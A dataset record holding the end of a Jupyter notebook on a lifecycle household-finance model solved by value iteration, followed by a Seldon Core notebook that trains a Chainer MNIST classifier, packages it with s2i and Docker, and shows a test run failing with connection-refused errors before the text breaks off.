x = [w_next, n_next, M_next, e_next, s_next, z_next]\n # create the empty numpy array to collect future states and probability \n if t >= T_R:\n future_states = np.zeros((aSize*nS,nX))\n n_next = gn(t, n, x, (r_k+r_b)/2)\n future_states[:,0] = np.repeat(b*(1+r_b[s]), nS) + np.repeat(k, nS)*(1+np.tile(r_k, aSize))\n future_states[:,1] = np.tile(n_next,aSize)\n future_states[:,2] = M_next\n future_states[:,3] = 0\n future_states[:,4] = np.tile(range(nS),aSize)\n future_states[:,5] = np.repeat(z_next,nS)\n future_probs = np.tile(Ps[s],aSize)\n else:\n future_states = np.zeros((2*aSize*nS,nX))\n n_next = gn(t, n, x, (r_k+r_b)/2)\n future_states[:,0] = np.repeat(b*(1+r_b[s]), 2*nS) + np.repeat(k, 2*nS)*(1+np.tile(r_k, 2*aSize))\n future_states[:,1] = np.tile(n_next,2*aSize)\n future_states[:,2] = M_next\n future_states[:,3] = np.tile(np.repeat([0,1],nS), aSize)\n future_states[:,4] = np.tile(range(nS),2*aSize)\n future_states[:,5] = np.repeat(z_next,2*nS)\n # employed right now:\n if e == 1:\n future_probs = np.tile(np.append(Ps[s]*Pe[s,e], Ps[s]*(1-Pe[s,e])),aSize)\n else:\n future_probs = np.tile(np.append(Ps[s]*(1-Pe[s,e]), Ps[s]*Pe[s,e]),aSize)\n return future_states, future_probs", "_____no_output_____" ], [ "# Use to approximate the discrete values in V\nclass Approxy(object):\n def __init__(self, points, Vgrid):\n self.V = Vgrid \n self.p = points\n def predict(self, xx):\n pvalues = np.zeros(xx.shape[0])\n for e in [0,1]:\n for s in range(nS):\n for z in [0,1]:\n index = (xx[:,3] == e) & (xx[:,4] == s) & (xx[:,5] == z)\n pvalues[index]=interpn(self.p, self.V[:,:,:,e,s,z], xx[index][:,:3], \n bounds_error = False, fill_value = None)\n return pvalues\n# used to calculate dot product\ndef dotProduct(p_next, uBTB, t):\n if t >= T_R:\n return (p_next*uBTB).reshape((len(p_next)//(nS),(nS))).sum(axis = 1)\n else:\n return (p_next*uBTB).reshape((len(p_next)//(2*nS),(2*nS))).sum(axis = 1)", "_____no_output_____" ], [ "# Value function is a function of state and time t < T\ndef V(x, t, NN):\n w, n, M, e, s, z = x\n yat = yAT(t,x)\n m = M/D[T_max - t]\n # If the agent can not pay for the ortgage \n if yat + w < m:\n return [0, [0,0,0,0,0]]\n # The agent can pay for the mortgage\n if t == T_max-1:\n # The objective functions of terminal state \n def obj(actions):\n # Not renting out case \n # a = [c, b, k, q]\n x_next, p_next = transition(x, actions, t)\n uBTB = uB(calTB(x_next)) # conditional on being dead in the future\n return R(x, actions) + beta * dotProduct(uBTB, p_next, t)\n else:\n def obj(actions):\n # Renting out case\n # a = [c, b, k, q]\n x_next, p_next = transition(x, actions, t)\n V_tilda = NN.predict(x_next) # V_{t+1} conditional on being alive, approximation here\n uBTB = uB(calTB(x_next)) # conditional on being dead in the future\n return R(x, actions) + beta * (Pa[t] * dotProduct(V_tilda, p_next, t) + (1 - Pa[t]) * dotProduct(uBTB, p_next, t))\n \n def obj_solver(obj):\n # Constrain: yat + w - m = c + b + kk\n actions = []\n budget1 = yat + w - m\n for cp in np.linspace(0.001,0.999,11):\n c = budget1 * cp\n budget2 = budget1 * (1-cp)\n #.....................stock participation cost...............\n for kp in np.linspace(0,1,11):\n # If z == 1 pay for matainance cost Km = 0.5\n if z == 1:\n # kk is stock allocation\n kk = budget2 * kp\n if kk > Km:\n k = kk - Km\n b = budget2 * (1-kp)\n else:\n k = 0\n b = budget2\n # If z == 0 and k > 0 payfor participation fee Kc = 5\n else:\n kk = budget2 * kp \n if kk > Kc:\n k = kk - Kc\n b = budget2 * (1-kp)\n else:\n k = 0\n b = budget2\n 
#..............................................................\n # q = 1 not renting in this case \n actions.append([c,b,k,1])\n \n # Constrain: yat + w - m + (1-q)*H*pr = c + b + kk\n for q in [1,0.5]:\n budget1 = yat + w - m + (1-q)*H*pr\n for cp in np.linspace(0.001,0.999,11):\n c = budget1*cp\n budget2 = budget1 * (1-cp)\n #.....................stock participation cost...............\n for kp in np.linspace(0,1,11):\n # If z == 1 pay for matainance cost Km = 0.5\n if z == 1:\n # kk is stock allocation\n kk = budget2 * kp\n if kk > Km:\n k = kk - Km\n b = budget2 * (1-kp)\n else:\n k = 0\n b = budget2\n # If z == 0 and k > 0 payfor participation fee Kc = 5\n else:\n kk = budget2 * kp \n if kk > Kc:\n k = kk - Kc\n b = budget2 * (1-kp)\n else:\n k = 0\n b = budget2\n #..............................................................\n # i = 0, no housing improvement when renting out \n actions.append([c,b,k,q]) \n \n actions = np.array(actions)\n values = obj(actions)\n fun = np.max(values)\n ma = actions[np.argmax(values)]\n return fun, ma\n \n fun, action = obj_solver(obj)\n return np.array([fun, action])", "_____no_output_____" ], [ "# wealth discretization \nws = np.array([10,25,50,75,100,125,150,175,200,250,500,750,1000,1500,3000])\nw_grid_size = len(ws)\n# 401k amount discretization \nns = np.array([1, 5, 10, 15, 25, 50, 100, 150, 400, 1000])\nn_grid_size = len(ns)\n# Mortgage amount\nMs = np.array([0.01*H,0.05*H,0.1*H,0.2*H,0.3*H,0.4*H,0.5*H,0.8*H]) * pt\nM_grid_size = len(Ms)\npoints = (ws,ns,Ms)\n# dimentions of the state\ndim = (w_grid_size, n_grid_size,M_grid_size,2,nS,2)\ndimSize = len(dim)\n\nxgrid = np.array([[w, n, M, e, s, z] \n for w in ws\n for n in ns\n for M in Ms\n for e in [0,1]\n for s in range(nS)\n for z in [0,1]\n ]).reshape(dim + (dimSize,))\n\n# reshape the state grid into a single line of states to facilitate multiprocessing\nxs = xgrid.reshape((np.prod(dim),dimSize))\nVgrid = np.zeros(dim + (T_max,))\ncgrid = np.zeros(dim + (T_max,))\nbgrid = np.zeros(dim + (T_max,))\nkgrid = np.zeros(dim + (T_max,))\nqgrid = np.zeros(dim + (T_max,))\nprint(\"The size of the housing: \", H)\nprint(\"The size of the grid: \", dim + (T_max,))", "The size of the housing: 750\nThe size of the grid: (15, 10, 8, 2, 27, 2, 60)\n" ], [ "%%time\n# value iteration part, create multiprocesses 32\npool = Pool()\nfor t in range(T_max-1,T_max-3, -1):\n print(t)\n if t == T_max - 1:\n f = partial(V, t = t, NN = None)\n results = np.array(pool.map(f, xs))\n else:\n approx = Approxy(points,Vgrid[:,:,:,:,:,:,t+1])\n f = partial(V, t = t, NN = approx)\n results = np.array(pool.map(f, xs))\n Vgrid[:,:,:,:,:,:,t] = results[:,0].reshape(dim)\n cgrid[:,:,:,:,:,:,t] = np.array([r[0] for r in results[:,1]]).reshape(dim)\n bgrid[:,:,:,:,:,:,t] = np.array([r[1] for r in results[:,1]]).reshape(dim)\n kgrid[:,:,:,:,:,:,t] = np.array([r[2] for r in results[:,1]]).reshape(dim)\n qgrid[:,:,:,:,:,:,t] = np.array([r[3] for r in results[:,1]]).reshape(dim)\npool.close()", "59\n58\n" ] ] ]
[ "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ] ]
cb1cdb1ec7124800d2f99a1279464e7999345f50
88,761
ipynb
Jupyter Notebook
examples/models/chainer_mnist/chainer_mnist.ipynb
LueJian/seldon-core
a40ea0cb52a04502d2dc5f78d124fca67b0926ae
[ "Apache-2.0" ]
1
2020-10-10T07:46:00.000Z
2020-10-10T07:46:00.000Z
examples/models/chainer_mnist/chainer_mnist.ipynb
LueJian/seldon-core
a40ea0cb52a04502d2dc5f78d124fca67b0926ae
[ "Apache-2.0" ]
null
null
null
examples/models/chainer_mnist/chainer_mnist.ipynb
LueJian/seldon-core
a40ea0cb52a04502d2dc5f78d124fca67b0926ae
[ "Apache-2.0" ]
null
null
null
64.741794
521
0.490948
[ [ [ "# Chainer MNIST Model Deployment\n\n * Wrap a Chainer MNIST python model for use as a prediction microservice in seldon-core\n * Run locally on Docker to test\n * Deploy on seldon-core running on minikube\n \n## Dependencies\n\n * [Helm](https://github.com/kubernetes/helm)\n * [Minikube](https://github.com/kubernetes/minikube)\n * [S2I](https://github.com/openshift/source-to-image)\n\n```bash\npip install seldon-core\npip install chainer==6.2.0\n```\n\n## Train locally\n ", "_____no_output_____" ] ], [ [ "#!/usr/bin/env python\nimport argparse\n\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\nfrom chainer import training\nfrom chainer.training import extensions\nimport chainerx\n\n\n# Network definition\nclass MLP(chainer.Chain):\n\n def __init__(self, n_units, n_out):\n super(MLP, self).__init__()\n with self.init_scope():\n # the size of the inputs to each layer will be inferred\n self.l1 = L.Linear(None, n_units) # n_in -> n_units\n self.l2 = L.Linear(None, n_units) # n_units -> n_units\n self.l3 = L.Linear(None, n_out) # n_units -> n_out\n\n def forward(self, x):\n h1 = F.relu(self.l1(x))\n h2 = F.relu(self.l2(h1))\n return self.l3(h2)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Chainer example: MNIST')\n parser.add_argument('--batchsize', '-b', type=int, default=100,\n help='Number of images in each mini-batch')\n parser.add_argument('--epoch', '-e', type=int, default=20,\n help='Number of sweeps over the dataset to train')\n parser.add_argument('--frequency', '-f', type=int, default=-1,\n help='Frequency of taking a snapshot')\n parser.add_argument('--device', '-d', type=str, default='-1',\n help='Device specifier. Either ChainerX device '\n 'specifier or an integer. If non-negative integer, '\n 'CuPy arrays with specified device id are used. 
If '\n 'negative integer, NumPy arrays are used')\n parser.add_argument('--out', '-o', default='result',\n help='Directory to output the result')\n parser.add_argument('--resume', '-r', type=str,\n help='Resume the training from snapshot')\n parser.add_argument('--unit', '-u', type=int, default=1000,\n help='Number of units')\n parser.add_argument('--noplot', dest='plot', action='store_false',\n help='Disable PlotReport extension')\n group = parser.add_argument_group('deprecated arguments')\n group.add_argument('--gpu', '-g', dest='device',\n type=int, nargs='?', const=0,\n help='GPU ID (negative value indicates CPU)')\n args = parser.parse_args(args=[])\n\n device = chainer.get_device(args.device)\n\n print('Device: {}'.format(device))\n print('# unit: {}'.format(args.unit))\n print('# Minibatch-size: {}'.format(args.batchsize))\n print('# epoch: {}'.format(args.epoch))\n print('')\n\n # Set up a neural network to train\n # Classifier reports softmax cross entropy loss and accuracy at every\n # iteration, which will be used by the PrintReport extension below.\n model = L.Classifier(MLP(args.unit, 10))\n model.to_device(device)\n device.use()\n\n # Setup an optimizer\n optimizer = chainer.optimizers.Adam()\n optimizer.setup(model)\n\n # Load the MNIST dataset\n train, test = chainer.datasets.get_mnist()\n\n train_iter = chainer.iterators.SerialIterator(train, args.batchsize)\n test_iter = chainer.iterators.SerialIterator(test, args.batchsize,\n repeat=False, shuffle=False)\n\n # Set up a trainer\n updater = training.updaters.StandardUpdater(\n train_iter, optimizer, device=device)\n trainer = training.Trainer(updater, (args.epoch, 'epoch'), out=args.out)\n\n # Evaluate the model with the test dataset for each epoch\n trainer.extend(extensions.Evaluator(test_iter, model, device=device))\n\n # Dump a computational graph from 'loss' variable at the first iteration\n # The \"main\" refers to the target link of the \"main\" optimizer.\n # TODO(niboshi): Temporarily disabled for chainerx. 
Fix it.\n if device.xp is not chainerx:\n trainer.extend(extensions.DumpGraph('main/loss'))\n\n # Take a snapshot for each specified epoch\n frequency = args.epoch if args.frequency == -1 else max(1, args.frequency)\n trainer.extend(extensions.snapshot(), trigger=(frequency, 'epoch'))\n\n # Write a log of evaluation statistics for each epoch\n trainer.extend(extensions.LogReport())\n\n # Save two plot images to the result dir\n if args.plot and extensions.PlotReport.available():\n trainer.extend(\n extensions.PlotReport(['main/loss', 'validation/main/loss'],\n 'epoch', file_name='loss.png'))\n trainer.extend(\n extensions.PlotReport(\n ['main/accuracy', 'validation/main/accuracy'],\n 'epoch', file_name='accuracy.png'))\n\n # Print selected entries of the log to stdout\n # Here \"main\" refers to the target link of the \"main\" optimizer again, and\n # \"validation\" refers to the default name of the Evaluator extension.\n # Entries other than 'epoch' are reported by the Classifier link, called by\n # either the updater or the evaluator.\n trainer.extend(extensions.PrintReport(\n ['epoch', 'main/loss', 'validation/main/loss',\n 'main/accuracy', 'validation/main/accuracy', 'elapsed_time']))\n\n # Print a progress bar to stdout\n trainer.extend(extensions.ProgressBar())\n\n if args.resume is not None:\n # Resume from a snapshot\n chainer.serializers.load_npz(args.resume, trainer)\n\n # Run the training\n trainer.run()\n\n\nif __name__ == '__main__':\n main()", "/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/chainer/_environment_check.py:41: UserWarning: Accelerate has been detected as a NumPy backend library.\nvecLib, which is a part of Accelerate, is known not to work correctly with Chainer.\nWe recommend using other BLAS libraries such as OpenBLAS.\nFor details of the issue, please see\nhttps://docs.chainer.org/en/stable/tips.html#mnist-example-does-not-converge-in-cpu-mode-on-mac-os-x.\n\nPlease be aware that Mac OS X is not an officially supported OS.\n\n ''') # NOQA\n" ] ], [ [ "Wrap model using s2i", "_____no_output_____" ] ], [ [ "!s2i build . seldonio/seldon-core-s2i-python3:1.3.0-dev chainer-mnist:0.1", "---> Installing application source...\n---> Installing dependencies ...\nLooking in links: /whl\nCollecting chainer==6.2.0 (from -r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nDownloading https://files.pythonhosted.org/packages/2c/5a/86c50a0119a560a39d782c4cdd9b72927c090cc2e3f70336e01b19a5f97a/chainer-6.2.0.tar.gz (873kB)\nRequirement already satisfied: setuptools in /usr/local/lib/python3.6/site-packages (from chainer==6.2.0->-r requirements.txt (line 1)) (41.0.1)\nCollecting typing<=3.6.6 (from chainer==6.2.0->-r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nDownloading https://files.pythonhosted.org/packages/4a/bd/eee1157fc2d8514970b345d69cb9975dcd1e42cd7e61146ed841f6e68309/typing-3.6.6-py3-none-any.whl\nCollecting typing_extensions<=3.6.6 (from chainer==6.2.0->-r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nDownloading https://files.pythonhosted.org/packages/62/4f/392a1fa2873e646f5990eb6f956e662d8a235ab474450c72487745f67276/typing_extensions-3.6.6-py3-none-any.whl\nCollecting filelock (from chainer==6.2.0->-r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. 
It is either a non-existing path or lacks a specific scheme.\nDownloading https://files.pythonhosted.org/packages/93/83/71a2ee6158bb9f39a90c0dea1637f81d5eef866e188e1971a1b1ab01a35a/filelock-3.0.12-py3-none-any.whl\nRequirement already satisfied: numpy>=1.9.0 in /usr/local/lib/python3.6/site-packages (from chainer==6.2.0->-r requirements.txt (line 1)) (1.16.4)\nCollecting protobuf<3.8.0rc1,>=3.0.0 (from chainer==6.2.0->-r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nDownloading https://files.pythonhosted.org/packages/5a/aa/a858df367b464f5e9452e1c538aa47754d467023850c00b000287750fa77/protobuf-3.7.1-cp36-cp36m-manylinux1_x86_64.whl (1.2MB)\nRequirement already satisfied: six>=1.9.0 in /usr/local/lib/python3.6/site-packages (from chainer==6.2.0->-r requirements.txt (line 1)) (1.12.0)\nBuilding wheels for collected packages: chainer\nBuilding wheel for chainer (setup.py): started\nBuilding wheel for chainer (setup.py): finished with status 'done'\nStored in directory: /root/.cache/pip/wheels/2e/be/c5/6ee506abcaa4a53106f7d7671bbee8b4e5243bc562a9d32ad1\nSuccessfully built chainer\nInstalling collected packages: typing, typing-extensions, filelock, protobuf, chainer\nFound existing installation: protobuf 3.8.0\nUninstalling protobuf-3.8.0:\nSuccessfully uninstalled protobuf-3.8.0\nSuccessfully installed chainer-6.2.0 filelock-3.0.12 protobuf-3.7.1 typing-3.6.6 typing-extensions-3.6.6\nWARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nWARNING: You are using pip version 19.1, however version 19.2.2 is available.\nYou should consider upgrading via the 'pip install --upgrade pip' command.\nBuild completed successfully\n" ], [ "!docker run --name \"mnist_predictor\" -d --rm -p 5000:5000 chainer-mnist:0.1", "b03f58f82ca07e25261be34b75be4a0ffbbfa1ad736d3866790682bf0d8202a3\r\n" ] ], [ [ "Send some random features that conform to the contract", "_____no_output_____" ] ], [ [ "!seldon-core-tester contract.json 0.0.0.0 5000 -p", "/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:516: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint8 = np.dtype([(\"qint8\", np.int8, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:517: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_quint8 = np.dtype([(\"quint8\", np.uint8, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:518: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint16 = np.dtype([(\"qint16\", np.int16, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:519: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_quint16 = np.dtype([(\"quint16\", np.uint16, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:520: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is 
deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint32 = np.dtype([(\"qint32\", np.int32, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:525: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n np_resource = np.dtype([(\"resource\", np.ubyte, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:541: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint8 = np.dtype([(\"qint8\", np.int8, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:542: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_quint8 = np.dtype([(\"quint8\", np.uint8, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:543: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint16 = np.dtype([(\"qint16\", np.int16, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:544: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_quint16 = np.dtype([(\"quint16\", np.uint16, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:545: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint32 = np.dtype([(\"qint32\", np.int32, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:550: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n np_resource = np.dtype([(\"resource\", np.ubyte, 1)])\n----------------------------------------\nSENDING NEW REQUEST:\n\n[[0.997 0.039 0.778 0.59 0.526 0.591 0.659 0.423 0.404 0.302 0.322 0.453\n 0.54 0.852 0.268 0.564 0.163 0.032 0.934 0.317 0.395 0.122 0.056 0.729\n 0.106 0.443 0.334 0.784 0.646 0.296 0.524 0.855 0.503 0.727 0.326 0.491\n 0.385 0.042 0.82 0.715 0.972 0.699 0.431 0.618 0.096 0.849 0.224 0.187\n 0.145 0.357 0.187 0.779 0.009 0.775 0.775 0.584 0.897 0.674 0.01 0.775\n 0.095 0.081 0.089 0.351 0.985 0.878 0.906 0.396 0.499 0.646 0.127 0.966\n 0.087 0.668 0.314 0.853 0.55 0.345 0.95 0.792 0.797 0.037 0.18 0.592\n 0.941 0.662 0.101 0.388 0.902 0.868 0.505 0.824 0.8 0.855 0.568 0.368\n 0.605 0.224 0.214 0.582 0.365 0.44 0.389 0.922 0.028 0.142 0.525 0.843\n 0.706 0.61 0.215 0.962 0.334 0.273 0.365 0.075 0.929 0.693 0.382 0.76\n 0.75 0.403 0.344 0.218 0.831 0.431 0.469 0.527 0.755 0.048 0.407 0.953\n 0.468 0.186 0.589 0.839 0.513 0.307 0.251 0.738 0.173 0.185 0.499 0.797\n 0.264 0.149 0.547 0.699 0.935 0.071 0.145 0.853 0.884 0.195 0.944 0.775\n 0.523 0.627 0.729 0.826 0.894 0.117 0.935 0.363 0.03 0.16 
0.435 0.579\n 0.954 0.487 0.133 0.348 0.12 0.741 0.203 0.103 0.334 0.009 0.898 0.597\n 0.375 0.241 0.27 0.094 0.819 0.737 0.147 0.715 0.138 0.801 0.427 0.602\n 0.336 0.796 0.691 0.415 0.329 0.155 0.17 0.152 0.237 0.957 0.298 0.837\n 0.982 0.805 0.972 0.125 0.916 0.101 0.054 0.347 0.566 0.232 0.885 0.864\n 0.049 0.205 0.361 0.767 0.099 0.634 0.359 0.975 0.56 0.289 0.49 0.359\n 0.901 0.39 0.197 0.985 0.141 0.232 0.336 0.932 0.923 0.032 0.126 0.51\n 0.571 0.743 0.831 0.999 0.972 0.649 0.527 0.909 0.071 0.539 0.676 0.851\n 0.104 0.103 0.392 0.641 0.838 0.333 0.453 0.573 0.199 0.924 0.588 0.955\n 0.866 0.085 0.985 0.803 0.386 0.713 0.056 0.972 0.489 0.623 0.108 0.904\n 0.746 0.986 0.824 0.996 0.161 0.738 0.24 0.153 0.935 0.782 0.393 0.098\n 0.449 0.24 0.621 0.293 0.569 0.196 0.893 0.605 0.608 0.114 0.383 0.038\n 0.573 0.373 0.474 0.006 0.292 0.738 0.943 0.65 0.553 0.684 0.3 0.587\n 0.183 0.521 0.211 0.074 0.696 0.672 0.206 0.694 0.129 0.81 0.415 0.56\n 0.994 0.686 0.807 0.514 0.215 0.096 0.295 0.233 0.625 0.663 0.794 0.16\n 0.837 0.194 0.07 0.939 0.965 0.142 0.66 0.152 0.249 0.995 0.892 0.265\n 0.865 0.742 0.19 0.03 0.42 0.807 0.15 0.163 0.529 0.23 0.59 0.676\n 0.121 0.474 0.329 0.383 0.534 0.093 0.861 0.058 0.019 0.212 0.296 0.947\n 0.879 0.445 0.357 0.021 0.551 0.362 0.653 0.258 0.146 0.453 0.373 0.448\n 0.339 0.974 0.266 0.656 0.036 0.698 0.651 0.91 0.438 0.767 0.716 0.267\n 0.871 0.781 0.13 0.912 0.13 0.332 0.647 0.31 0.171 0.323 0.703 0.197\n 0.918 0.803 0.43 0.103 0.606 0.955 0.733 0.902 0.139 0.471 0.994 0.393\n 0.95 0.485 0.782 0.213 0.994 0.206 0.938 0.019 0.429 0.135 0.811 0.209\n 0.991 0.93 0.878 0.742 0.859 0.397 0.128 0.087 0.447 0.392 0.61 0.18\n 0.087 0.641 0.31 0.033 0.211 0.431 0.051 0.639 0.461 0.466 0.171 0.736\n 0.727 0.183 0.542 0.416 0.524 0.251 0.513 0.087 0.395 0.164 0.25 0.384\n 0.705 0.683 0.827 0.188 0.163 0.325 0.256 0.904 0.161 0.334 0.639 0.728\n 0.267 0.463 0.373 0.111 0.585 0.794 0.972 0.281 0.984 0.564 0.671 0.868\n 0.741 0.638 0.702 0.778 0.667 0.372 0.818 0.49 0.102 0.403 0.187 0.283\n 0.492 0.937 0.643 0.657 0.514 0.492 0.042 0.809 0.088 0.018 0.631 0.731\n 0.516 0.625 0.597 0.629 0.798 0.907 0.861 0.439 0.777 0.014 0.771 0.152\n 0.16 0.997 0.699 0.127 0.038 0.503 0.572 0.878 0.901 0.215 0.606 0.686\n 0.847 0.007 0.976 0.895 0.357 0.374 0.989 0.544 0.317 0.043 0.718 0.788\n 0.121 0.432 0.16 0.485 0.553 0.048 0.003 0.375 0.592 0.207 0.853 0.81\n 0.043 0.554 0.084 0.584 0.73 0.766 0.738 0.038 0.56 0.475 0.763 0.002\n 0.382 0.49 0.302 0.873 0.141 0.023 0.341 0.113 0.197 0.948 0.088 0.294\n 0.778 0.807 0.935 0.712 0.466 0.885 0.815 0.843 0.745 0.217 0.664 0.142\n 0.421 0.371 0.536 0.009 0.036 0.352 0.916 0.161 0.345 0.348 0.688 0.806\n 0.434 0.413 0.567 0.043 0.934 0.072 0.54 0.347 0.817 0.321 0.85 0.478\n 0.832 0.899 0.283 0.34 0.304 0.955 0.915 0.934 0.452 0.423 0.75 0.013\n 0.5 0.691 0.854 0.453 0.959 0.843 0.698 0.756 0.918 0.992 0.663 0.608\n 0.756 0.7 0.347 0.427 0.198 0.37 0.837 0.362 0.291 0.126 0.695 0.777\n 0.318 0.88 0.859 0.958 0.075 0.332 0.321 0.179 0.834 0.027 0.332 0.799\n 0.504 0.274 0.819 0.081 0.337 0.02 0.598 0.727 0.159 0.937 0.199 0.639\n 0.063 0.75 0.637 0.686 0.677 0.102 0.135 0.264 0.091 0.837 0.562 0.453\n 0.503 0.884 0.147 0.966 0.118 0.293 0.327 0.859 0.958 0.498 0.369 0.123\n 0.354 0.812 0.163 0.96 0.64 0.596 0.029 0.84 0.159 0.717 0.025 0.394\n 0.185 0.29 0.554 0.646 0.432 0.197 0.668 0.531 0.206 0.599 0.842 0.579\n 0.836 0.889 0.797 0.891 0.1 0.087 0.825 0.952 0.781 0.295 0.819 0.038\n 0.34 0.476 0.08 0.784 0.556 0.282 0.699 0.954 
0.5 0.332 0.213 0.618\n 0.92 0.776 0.147 0.749 0.597 0.191 0.957 0.47 0.324 0.352 0.837 0.263\n 0.536 0.48 0.997 0.417 0.08 0.464 0.886 0.019 0.307 0.164 0.36 0.638\n 0.46 0.803 0.139 0.575]]\nTraceback (most recent call last):\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/urllib3/connection.py\", line 160, in _new_conn\n (self._dns_host, self.port), self.timeout, **extra_kw)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/urllib3/util/connection.py\", line 80, in create_connection\n raise err\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/urllib3/util/connection.py\", line 70, in create_connection\n sock.connect(sa)\nConnectionRefusedError: [Errno 61] Connection refused\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/urllib3/connectionpool.py\", line 603, in urlopen\n chunked=chunked)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/urllib3/connectionpool.py\", line 355, in _make_request\n conn.request(method, url, **httplib_request_kw)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/http/client.py\", line 1244, in request\n self._send_request(method, url, body, headers, encode_chunked)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/http/client.py\", line 1290, in _send_request\n self.endheaders(body, encode_chunked=encode_chunked)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/http/client.py\", line 1239, in endheaders\n self._send_output(message_body, encode_chunked=encode_chunked)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/http/client.py\", line 1026, in _send_output\n self.send(msg)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/http/client.py\", line 966, in send\n self.connect()\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/urllib3/connection.py\", line 183, in connect\n conn = self._new_conn()\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/urllib3/connection.py\", line 169, in _new_conn\n self, \"Failed to establish a new connection: %s\" % e)\nurllib3.exceptions.NewConnectionError: <urllib3.connection.HTTPConnection object at 0x1232a2050>: Failed to establish a new connection: [Errno 61] Connection refused\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/requests/adapters.py\", line 449, in send\n timeout=timeout\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/urllib3/connectionpool.py\", line 641, in urlopen\n _stacktrace=sys.exc_info()[2])\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/urllib3/util/retry.py\", line 399, in increment\n raise MaxRetryError(_pool, url, error or ResponseError(cause))\nurllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='0.0.0.0', port=5000): Max retries exceeded with url: /predict (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x1232a2050>: Failed to establish a new connection: [Errno 61] Connection refused'))\n\nDuring handling of the above exception, another exception 